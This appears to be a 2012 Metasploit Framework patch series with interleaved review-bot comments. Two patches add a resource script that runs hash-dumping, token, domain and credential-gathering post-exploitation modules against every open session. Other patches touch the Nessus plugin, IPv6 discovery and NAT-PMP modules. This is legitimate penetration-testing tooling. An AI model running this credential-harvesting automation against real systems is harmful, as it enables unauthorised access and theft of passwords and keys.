From 8825f873251f2576cf7f0904e0d6994bcd797f72 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 6 Feb 2012 08:50:32 +0100 Subject: [PATCH 01/15] multi_post resource file - initial commit --- scripts/resource/multi-post-rc-internal.rc | 119 +++++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 scripts/resource/multi-post-rc-internal.rc diff --git a/scripts/resource/multi-post-rc-internal.rc b/scripts/resource/multi-post-rc-internal.rc new file mode 100644 index 0000000000..cb93a4c6bf --- /dev/null +++ b/scripts/resource/multi-post-rc-internal.rc 
@@ -0,0 +1,119 @@ +# multi_post.rc +# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) + +# This Metasploit RC-File could be used to automate the post-exploitation process +# VERBOSE is used from the global datastore +# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi +# you could add your own post exploitation modules into them + + +if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it + verbose = 1 #true +else + verbose = 0 +end + +meterpreter_commands = [ + 'sysinfo', + 'getuid', + 'getpid', + 'ps', + 'ipconfig' +] + +modules_win = [ + 'post/windows/gather/hashdump', + 'post/windows/gather/cachedump', + 'post/windows/gather/smart_hashdump', + 'post/windows/gather/enum_tokens', + 'post/windows/gather/enum_domain', + 'post/windows/gather/enum_domain_group_users', + 'post/windows/gather/enum_domain_tokens', + 'post/windows/gather/enum_hostfile', + 'post/windows/gather/enum_ie', + 'post/windows/gather/enum_logged_on_users', + 'post/windows/gather/enum_ms_product_keys', + 'post/windows/gather/credentials/vnc', + 'post/windows/gather/credentials/windows_autologin', + 'post/windows/gather/checkvm', + 'post/windows/gather/enum_applications', + 'post/windows/gather/enum_services', + 'post/windows/gather/enum_shares', + 'post/windows/gather/enum_snmp', + 'post/windows/gather/enum_devices', + 'post/windows/gather/enum_powershell_env' +] # add some more modules or comment some out ... 
+modules_lin = [ + 'post/linux/gather/hashdump', + 'post/osx/gather/hashdump', + 'post/linux/gather/checkvm', + 'post/linux/gather/enum_cron', + 'post/linux/gather/enum_linux', + 'post/linux/gather/enum_packages', + 'post/linux/gather/enum_services', + 'post/osx/gather/enum_osx' +] +modules_multi = [ + 'post/multi/gather/env', + 'post/multi/gather/ssh_creds' +] + +if (framework.sessions.length > 0) # lets start if we have a session + print_status("starting with post exploitation stuff") + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + #meterpreter commands against every meterpreter session + if(session.type == "meterpreter") + print_line("starting meterpreter commands on session number #{sid}") + meterpreter_commands.each { |command| + print_line("running meterpreter command #{command}") + session.console.run_single("#{command.to_s}") + print_line + } + end + end + + print_status("starting the post exploitation with post exploitation modules") + + # lets start with post exploitation modules + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + ips = session.tunnel_peer.split(":") + print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}") + + modules_multi.each { |modul| # multi -> all sessions + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + if(session.platform =~ /win/) # windows sessions + modules_win.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + else # all other sessions -> typical some linux or unix based systems + modules_lin.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + end + end +else + print_error("no sessions available") +end +run_single("back") + \ No newline at end 
of file From 91820ad1c3102407f5271f82e459d90261ddc114 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 6 Feb 2012 08:56:35 +0100 Subject: [PATCH 02/15] logging to notes --- modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index d6210c7524..9eed27dded 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -132,6 +132,14 @@ class Metasploit3 < Msf::Auxiliary next if not addr print_status(sprintf(" %16s maps to %s",addr[:ipv4], addr[:ipv6])) + report_note( + :host => addr[:ipv4], + :proto => 'IP', + :sname => 'all', + :type => 'IPv4 to IPv6 mapping', + :data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}" + ) # with this we have the results in our database + end end From 74c20464402c5b78e2e8afcee3d06d47be86b6be Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Mon, 6 Feb 2012 21:48:05 -0400 Subject: [PATCH 03/15] Fix several of the prints for tables, change Constant variables to instace variables so they are removed when plugin is unloaded, removed several if statements for variables no longer set by user input and commented out the generation of the exploit index since it is not used at this moment --- plugins/nessus.rb | 150 ++++++++++++++++++++++------------------------ 1 file changed, 70 insertions(+), 80 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index a244d30140..9836aa159b 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb 
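Review bot: `ips = session.tunnel_peer.split(":")` followed by `ips[0]` prints only the first hextet when the peer is an IPv6 address, so the `Session ID: … - IP:` line is wrong for IPv6 sessions; taking the text before the last colon, `peer_ip = session.tunnel_peer.rpartition(":").first`, handles both address families. `verbose` is an integer 0/1 tested with `== 1` in three identical if/else blocks; a boolean `verbose = framework.datastore['VERBOSE'] == "true"` with `run_single(verbose ? "run -j" : "run -j -q")` collapses each block to one line, and the three `modules_*.each` loops differ only in the list they walk, so one lambda taking the list would keep the use/set/run sequence in a single place. Whether the datastore always stores VERBOSE as the lower-case string "true" is not visible here and worth confirming before relying on that comparison. The same file is added again unchanged as scripts/resource/multi_post.rc in PATCH 04, so any fix here belongs there as well.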
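Review bot: `:type => 'IPv4 to IPv6 mapping'` is a free-form string with spaces and `:data` a prose sentence, which makes the note awkward to look up or join on later; other framework notes use dotted identifiers and a hash for data. I would write `:type => 'host.ipv6_address'` (suggested name), `:data => { :ipv4 => addr[:ipv4], :ipv6 => addr[:ipv6] }` and add `:update => :unique_data` so re-running the scan does not accumulate duplicate notes. `:proto => 'IP'` and `:sname => 'all'` without a `:port` probably do not bind the note to a service at all — worth confirming against report_note before keeping them. The enclosing method starts and ends outside the hunk.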
@@ -5,20 +5,15 @@ require 'nessus/nessus-xmlrpc' require 'rex/parser/nessus_xml' module Msf - #constants - NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf - Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits. - Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds - class Plugin::Nessus < Msf::Plugin #creates the index of exploit details to make searching for exploits much faster. def create_xindex start = Time.now - print_status("Creating Exploit Search Index - (#{Xindex}) - this wont take long.") + print_status("Creating Exploit Search Index - (#{@xindex}) - this wont take long.") count = 0 # use Msf::Config.get_config_root as the location. - File.open("#{Xindex}", "w+") do |f| + File.open("#{@xindex}", "w+") do |f| #need to add version line. f.puts(Msf::Framework::RepoRevision) framework.exploits.sort.each { |refname, mod| @@ -48,13 +43,13 @@ module Msf end def nessus_index - if File.exist?("#{Xindex}") + if File.exist?("#{@xindex}") #check if it's version line matches current version. - File.open("#{Xindex}") {|f| + File.open("#{@xindex}") {|f| line = f.readline line.chomp! if line.to_i == Msf::Framework::RepoRevision - print_good("Exploit Index - (#{Xindex}) - is valid.") + print_good("Exploit Index - (#{@xindex}) - is valid.") else create_xindex end 
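Review bot: `File.exist?("#{@xindex}")` and `File.open("#{@xindex}", "w+")` keep a String wrapped in interpolation; since `@xindex` is already a String, `File.exist?(@xindex)` and `File.open(@xindex, "w+")` say the same thing without the extra allocation, and the same `"#{@nessus_yaml}"` pattern is carried into the @@ -135, @@ -198 and @@ -327 hunks. Both `create_xindex` and `nessus_index` continue past their hunks, and the @@ -1608 hunk comments out the load-time call to `nessus_index`, so a comment on `create_xindex` recording how it is now reached (presumably only through the `nessus_index` console command) would help the next reader.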
@@ -73,42 +68,41 @@ module Msf def commands { - "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port ", - "nessus_admin" => "Checks if user is an admin", - "nessus_help" => "Get help on all commands", - "nessus_logout" => "Terminate the session", - "nessus_server_status" => "Check the status of your Nessus Server", - "nessus_server_feed" => "Nessus Feed Type", - "nessus_server_prefs" => "Display Server Prefs", - "nessus_report_list" => "List all Nessus reports", - "nessus_report_get" => "Import a report from the nessus server in Nessus v2 format", - "nessus_report_del" => "Delete a report", - "nessus_report_hosts" => "Get list of hosts from a report", - "nessus_report_host_ports" => "Get list of open ports from a host from a report", - "nessus_report_host_detail" => "Detail from a report item on a host", - "nessus_scan_status" => "List all currently running Nessus scans", - "nessus_scan_new" => "Create new Nessus Scan", - "nessus_scan_pause" => "Pause a Nessus Scan", - "nessus_scan_pause_all" => "Pause all Nessus Scans", - "nessus_scan_stop" => "Stop a Nessus Scan", - "nessus_scan_stop_all" => "Stop all Nessus Scans", - "nessus_scan_resume" => "Resume a Nessus Scan", - "nessus_scan_resume_all" => "Resume all Nessus Scans", - "nessus_user_list" => "Show Nessus Users", - "nessus_user_add" => "Add a new Nessus User", - "nessus_user_del" => "Delete a Nessus User", - "nessus_user_passwd" => "Change Nessus Users Password", - "nessus_plugin_family" => "List plugins in a family", - "nessus_plugin_details" => "List details of a particular plugin", - "nessus_plugin_list" => "Displays each plugin family and the number of plugins", - "nessus_plugin_prefs" => "Display Plugin Prefs", - "nessus_policy_list" => "List all polciies", - "nessus_policy_del" => "Delete a policy", + "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port .", + "nessus_admin" => "Checks if user is an admin.", + "nessus_help" => "Get 
help on all commands.", + "nessus_logout" => "Terminate the session.", + "nessus_server_status" => "Check the status of your Nessus Server.", + "nessus_server_feed" => "Nessus Feed Type.", + "nessus_server_prefs" => "Display Server Prefs.", + "nessus_report_list" => "List all Nessus reports.", + "nessus_report_get" => "Import a report from the nessus server in Nessus v2 format.", + "nessus_report_del" => "Delete a report.", + "nessus_report_hosts" => "Get list of hosts from a report.", + "nessus_report_host_ports" => "Get list of open ports from a host from a report.", + "nessus_report_host_detail" => "Detail from a report item on a host.", + "nessus_scan_status" => "List all currently running Nessus scans.", + "nessus_scan_new" => "Create new Nessus Scan.", + "nessus_scan_pause" => "Pause a Nessus Scan.", + "nessus_scan_pause_all" => "Pause all Nessus Scans.", + "nessus_scan_stop" => "Stop a Nessus Scan.", + "nessus_scan_stop_all" => "Stop all Nessus Scans.", + "nessus_scan_resume" => "Resume a Nessus Scan.", + "nessus_scan_resume_all" => "Resume all Nessus Scans.", + "nessus_user_list" => "Show Nessus Users.", + "nessus_user_add" => "Add a new Nessus User.", + "nessus_user_del" => "Delete a Nessus User.", + "nessus_user_passwd" => "Change Nessus Users Password.", + "nessus_plugin_family" => "List plugins in a family.", + "nessus_plugin_details" => "List details of a particular plugin.", + "nessus_plugin_list" => "Displays each plugin family and the number of plugins.", + "nessus_plugin_prefs" => "Display Plugin Prefs.", + "nessus_policy_list" => "List all polciies.", + "nessus_policy_del" => "Delete a policy.", "nessus_index" => "Manually generates a search index for exploits.", - "nessus_template_list" => "List all the templates on the server", - "nessus_db_scan" => "Create a scan of all ips in db_hosts", - "nessus_save" => "Save username/passowrd/server/port details", - "nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf 
exploit." + "nessus_template_list" => "List all the templates on the server.", + "nessus_db_scan" => "Create a scan of all ips in db_hosts.", + "nessus_save" => "Save username/passowrd/server/port details." } end @@ -135,10 +129,10 @@ module Msf if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) config = Hash.new config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}} - File.open("#{Nessus_yaml}", "w+") do |f| + File.open("#{@nessus_yaml}", "w+") do |f| f.puts YAML.dump(config) end - print_good("#{Nessus_yaml} created.") + print_good("#{@nessus_yaml} created.") else print_error("Missing username/password/server/port - relogin and then try again.") @@ -198,8 +192,8 @@ module Msf def cmd_nessus_logout @token = nil print_status("Logged out") - system("rm #{Nessus_yaml}") - print_good("#{Nessus_yaml} removed.") + system("rm #{@nessus_yaml}") + print_good("#{@nessus_yaml} removed.") return end @@ -259,7 +253,7 @@ module Msf tbl << [ "nessus_policy_list", "List all polciies" ] tbl << [ "nessus_policy_del", "Delete a policy" ] print_status "" - print_status tbl.to_s + print_line tbl.to_s print_status "" end @@ -285,7 +279,7 @@ module Msf tbl << [@feed, @version, @web_version] print_good("Nessus Status") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end end @@ -327,8 +321,8 @@ module Msf def cmd_nessus_connect(*args) if ! args[0] - if File.exist?("#{Nessus_yaml}") - lconfig = YAML.load_file("#{Nessus_yaml}") + if File.exist?("#{@nessus_yaml}") + lconfig = YAML.load_file("#{@nessus_yaml}") @user = lconfig['default']['username'] @pass = lconfig['default']['password'] @host = lconfig['default']['server'] 
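Review bot: the rewritten help strings still carry the typos `"List all polciies."` and `"Save username/passowrd/server/port details."`; since every line in this hash is touched anyway, make them `"List all policies."` and `"Save username/password/server/port details."` (the nessus_help table in the @@ -259 hunk repeats `List all polciies`). The `nessus_report_exploits` entry disappears from `commands`, but nothing in this diff removes a `cmd_nessus_report_exploits` method; if it still exists it is now hidden from the help listing, which deserves a line in the commit message either way.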
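Review bot: `@nessus_yaml` is read here inside the console command dispatcher (`@user`, `@pass`, `@host` on the neighbouring lines are dispatcher state), but the @@ -1608 hunk assigns it in the plugin's `initialize`, i.e. on the `Plugin::Nessus` object rather than on the `ConsoleCommandDispatcher` instance; unless the dispatcher sets it somewhere outside this diff, it is nil here and `File.open("", "w+")` raises Errno::ENOENT where the old constant worked. The @@ -198 and @@ -327 hunks read the same ivar from the dispatcher. Either hand the value to the dispatcher when it is created or keep a module-level constant for the path. Independently, this file stores the Nessus password in clear text, so create it owner-only, `File.open(@nessus_yaml, "w+", 0600) do |f|`, rather than with whatever the umask allows.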
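Review bot: `system("rm #{@nessus_yaml}")` spawns a shell to delete one file, which does nothing useful when the console runs on Windows and prints an `rm` error when the file is absent, while `print_good("#{@nessus_yaml} removed.")` is reported regardless of the outcome. `File.delete(@nessus_yaml) if File.exist?(@nessus_yaml)` removes the subprocess and lets the success message follow what actually happened; the trailing `return` is redundant at the end of the method.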
@@ -483,7 +477,7 @@ module Msf } print_good("Nessus Report List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s + "\n" print_status("You can:") print_status(" Get a list of hosts from the report: nessus_report_hosts ") end @@ -609,7 +603,7 @@ module Msf } print_good("Running Scans") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") @@ -655,7 +649,7 @@ module Msf } print_good("Templates") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s + "\n" print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") @@ -695,7 +689,7 @@ module Msf } print_good("Nessus users") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_server_status(*args) @@ -755,7 +749,7 @@ module Msf plugins = total.sum tbl << [users, policies, scans, reports, plugins] print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_plugin_list(*args) @@ -789,7 +783,7 @@ module Msf tbl << [ 'Total Plugins', plugins ] print_good("Plugins By Family") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_status("List plugins for a family : nessus_plugin_family ") end @@ -959,7 +953,7 @@ module Msf } print_good("Report Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_status("You can:") print_status(" Get information from a particular host: nessus_report_host_ports ") end @@ -1007,7 +1001,7 @@ module Msf } print_good("Host Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_status("You can:") print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail ") end @@ -1069,7 +1063,7 @@ module Msf } print_good("Port Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_scan_pause_all(*args) 
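Review bot: this hunk keeps `print_line tbl.to_s + "\n"` while the @@ -609, @@ -695, @@ -755, @@ -789, @@ -959, @@ -1007 and @@ -1069 hunks in the same commit change the identical line to `print_line tbl.to_s`; the @@ -655 hunk here and @@ -1564 later also keep the `+ "\n"`. Pick one form so every command spaces its table the same way — `print_line tbl.to_s` matches the majority. The `print_good "\n"` immediately above each table still emits a line holding only the `[+]` prefix; `print_line ""` (or dropping it) looks like what was intended.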
@@ -1358,7 +1352,7 @@ module Msf } print_good("#{fam} Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_policy_list(*args) @@ -1388,7 +1382,7 @@ module Msf } print_good("Nessus Policy List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_policy_del(*args) @@ -1422,7 +1416,7 @@ module Msf return end - if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes" + del = @n.policy_del(pid) status = del.root.elements['status'].text if status == "OK" @@ -1430,10 +1424,8 @@ module Msf else print_error("Policy number #{pid} was not deleted") end - else - print_error("wow that was close, damn we asked") + end - end def cmd_nessus_plugin_details(*args) @@ -1484,7 +1476,7 @@ module Msf tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ] tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ] print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_report_del(*args) @@ -1518,7 +1510,7 @@ module Msf return end - if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes") + del = @n.report_del(rid) status = del.root.elements['status'].text if status == "OK" @@ -1526,13 +1518,8 @@ module Msf else print_error("Report #{rid} was not deleted") end - else - print_error("wow that was close, damn we asked") end - - end - def cmd_nessus_server_prefs(*args) if args[0] == "-h" @@ -1564,7 +1551,7 @@ module Msf } print_good("Nessus Server Pref List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s + "\n" end @@ -1600,7 +1587,7 @@ module Msf } print_good("Nessus Plugins Pref List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end end 
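Review bot: with the `answer == "Yes" || …` guard removed, `cmd_nessus_policy_del` and `cmd_nessus_report_del` delete on the first invocation without any confirmation; if that is the intended behaviour, a one-line comment such as `# no confirmation prompt: the policy is deleted immediately` on the `del = @n.policy_del(pid)` line records the decision. The `+` blank line left where the `if` stood in the @@ -1422 and @@ -1518 hunks and the reshuffled `end`s in @@ -1430 and @@ -1526 make the remaining nesting hard to follow, and the @@ -1526 hunk appears to drop the blank line separating the method from `def cmd_nessus_server_prefs` — worth re-indenting those two method bodies as a whole. Both methods start outside their hunks.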
@@ -1608,9 +1595,12 @@ module Msf super add_console_dispatcher(ConsoleCommandDispatcher) - print_status("Nessus Bridge for Metasploit #{NBVer}") + @nbver = "1.1" # Nessus Plugin Version. Increments each time we commit to msf + @xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits. + @nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds + print_status("Nessus Bridge for Metasploit #{@nbver}") print_good("Type %bldnessus_help%clr for a command listing") - nessus_index + #nessus_index end def cleanup @@ -1622,7 +1612,7 @@ module Msf end def desc - "Nessus Bridge for Metasploit #{NBVer}" + "Nessus Bridge for Metasploit #{@nbver}" end protected end From 2c762d7f7e254e78ce67e84514a585d1187deaba Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Tue, 7 Feb 2012 08:40:35 +0100 Subject: [PATCH 04/15] renamed multi post resource file --- scripts/resource/multi_post.rc | 119 +++++++++++++++++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 scripts/resource/multi_post.rc diff --git a/scripts/resource/multi_post.rc b/scripts/resource/multi_post.rc new file mode 100644 index 0000000000..cb93a4c6bf --- /dev/null +++ b/scripts/resource/multi_post.rc 
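Review bot: `#nessus_index` is commented out with no explanation, so the next reader cannot tell whether the exploit index is broken, slow or just unused; a comment such as `# nessus_index  # exploit index generation disabled: nothing consumes it yet` (the reason given in the commit message) keeps that knowledge in the file. The three ivars are assigned after `add_console_dispatcher(ConsoleCommandDispatcher)`; assigning them right after `super` makes the order irrelevant if the dispatcher ever needs them at construction time.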
@@ -0,0 +1,119 @@ +# multi_post.rc +# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) + +# This Metasploit RC-File could be used to automate the post-exploitation process +# VERBOSE is used from the global datastore +# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi +# you could add your own post exploitation modules into them + + +if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it + verbose = 1 #true +else + verbose = 0 +end + +meterpreter_commands = [ + 'sysinfo', + 'getuid', + 'getpid', + 'ps', + 'ipconfig' +] + +modules_win = [ + 'post/windows/gather/hashdump', + 'post/windows/gather/cachedump', + 'post/windows/gather/smart_hashdump', + 'post/windows/gather/enum_tokens', + 'post/windows/gather/enum_domain', + 'post/windows/gather/enum_domain_group_users', + 'post/windows/gather/enum_domain_tokens', + 'post/windows/gather/enum_hostfile', + 'post/windows/gather/enum_ie', + 'post/windows/gather/enum_logged_on_users', + 'post/windows/gather/enum_ms_product_keys', + 'post/windows/gather/credentials/vnc', + 'post/windows/gather/credentials/windows_autologin', + 'post/windows/gather/checkvm', + 'post/windows/gather/enum_applications', + 'post/windows/gather/enum_services', + 'post/windows/gather/enum_shares', + 'post/windows/gather/enum_snmp', + 'post/windows/gather/enum_devices', + 'post/windows/gather/enum_powershell_env' +] # add some more modules or comment some out ... 
+modules_lin = [ + 'post/linux/gather/hashdump', + 'post/osx/gather/hashdump', + 'post/linux/gather/checkvm', + 'post/linux/gather/enum_cron', + 'post/linux/gather/enum_linux', + 'post/linux/gather/enum_packages', + 'post/linux/gather/enum_services', + 'post/osx/gather/enum_osx' +] +modules_multi = [ + 'post/multi/gather/env', + 'post/multi/gather/ssh_creds' +] + +if (framework.sessions.length > 0) # lets start if we have a session + print_status("starting with post exploitation stuff") + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + #meterpreter commands against every meterpreter session + if(session.type == "meterpreter") + print_line("starting meterpreter commands on session number #{sid}") + meterpreter_commands.each { |command| + print_line("running meterpreter command #{command}") + session.console.run_single("#{command.to_s}") + print_line + } + end + end + + print_status("starting the post exploitation with post exploitation modules") + + # lets start with post exploitation modules + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + ips = session.tunnel_peer.split(":") + print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}") + + modules_multi.each { |modul| # multi -> all sessions + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + if(session.platform =~ /win/) # windows sessions + modules_win.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + else # all other sessions -> typical some linux or unix based systems + modules_lin.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + end + end +else + print_error("no sessions available") +end +run_single("back") + \ No newline at end 
of file From 705c436ede86b09b6b63c9aeac3ac00e27afe2d2 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Tue, 7 Feb 2012 11:45:20 +0100 Subject: [PATCH 05/15] added more multicast addresses from wikipedia --- .../scanner/discovery/ipv6_multicast_ping.rb | 27 ++++++++++++------- 1 file changed, 18 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 2abba0700e..c543662412 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -1,5 +1,5 @@ ## -# $Id$ +# $Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $ ## require 'msf/core' @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Link Local/Node Local Ping Discovery', - 'Version' => '$Revision$', + 'Version' => '$Revision: 13962 $', 'Description' => %q{ Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds. }, 
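Review bot: the @@ -1 and @@ -13 hunks replace the `$Id$` and `$Revision$` keyword placeholders with already-expanded SVN strings (`$Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $`, `'Version' => '$Revision: 13962 $'`) that point at a revision this file is no longer at; git expands nothing here, so the placeholders should stay as `# $Id$` and `'Version' => '$Revision$',`. This looks like an edited copy from an older checkout being committed over the file rather than an intended change.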
@@ -65,15 +65,24 @@ class Metasploit3 < Msf::Auxiliary # Send ping print_status("Sending multicast pings...") dmac = "33:33:00:00:00:01" - + # Figure out our source address by the link-local interface shost = ipv6_link_address - - ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - + + # m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6 + ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes + ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers + ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment + ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment + ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers + ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers + ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers + ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers + ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers + ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810) + ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315) + ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315) + # Listen for host advertisments print_status("Listening for responses...") 
listen_for_ping_response() From 29b99aa7b44206209c8bb2d8ba7b3c0ce37be240 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 8 Feb 2012 12:23:46 -0600 Subject: [PATCH 06/15] Fix up titles/add boundary check for reporting external host --- modules/auxiliary/admin/natpmp/natpmp_map.rb | 22 +++++++++------- .../gather/natpmp_external_address.rb | 26 ++++++++++--------- .../scanner/natpmp/natpmp_portscan.rb | 26 ++++++++++--------- 3 files changed, 40 insertions(+), 34 deletions(-) diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index f4c029ef4f..a544fa5880 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -8,7 +8,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'NAT-PMP port mapper', + 'Name' => 'NAT-PMP Port Mapper', 'Description' => 'Map (forward) TCP and UDP ports on NAT devices using NAT-PMP', 'Author' => 'Jon Hart ', 'License' => MSF_LICENSE @@ -30,9 +30,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(host) begin - udp_sock = Rex::Socket::Udp.create( - { 'LocalHost' => datastore['CHOST'] || nil, - 'Context' => {'Msf' => framework, 'MsfExploit' => self} + udp_sock = Rex::Socket::Udp.create({ + 'LocalHost' => datastore['CHOST'] || nil, + 'Context' => {'Msf' => framework, 'MsfExploit' => self} }) add_socket(udp_sock) @@ -96,11 +96,13 @@ class Metasploit3 < Msf::Auxiliary ) # report the external port as being open - report_service( - :host => external_address, - :port => external_port, - :proto => datastore['PROTOCOL'].to_s.downcase, - :state => Msf::ServiceState::Open - ) + if inside_workspace_boundary(external_address) + report_service( + :host => external_address, + :port => external_port, + :proto => datastore['PROTOCOL'].to_s.downcase, + :state => Msf::ServiceState::Open + ) + end end end 
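Review bot: when `inside_workspace_boundary(external_address)` is false the mapping succeeded but nothing is recorded and nothing is said, so a user with a narrow workspace boundary sees a port mapped and an empty database with no hint why; a `vprint_status("#{external_address} is outside the workspace boundary, not reporting")` in an `else` branch explains it. The same silent skip is introduced in natpmp_external_address.rb (@@ -65) and natpmp_portscan.rb (@@ -98). The enclosing method starts outside the hunk.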
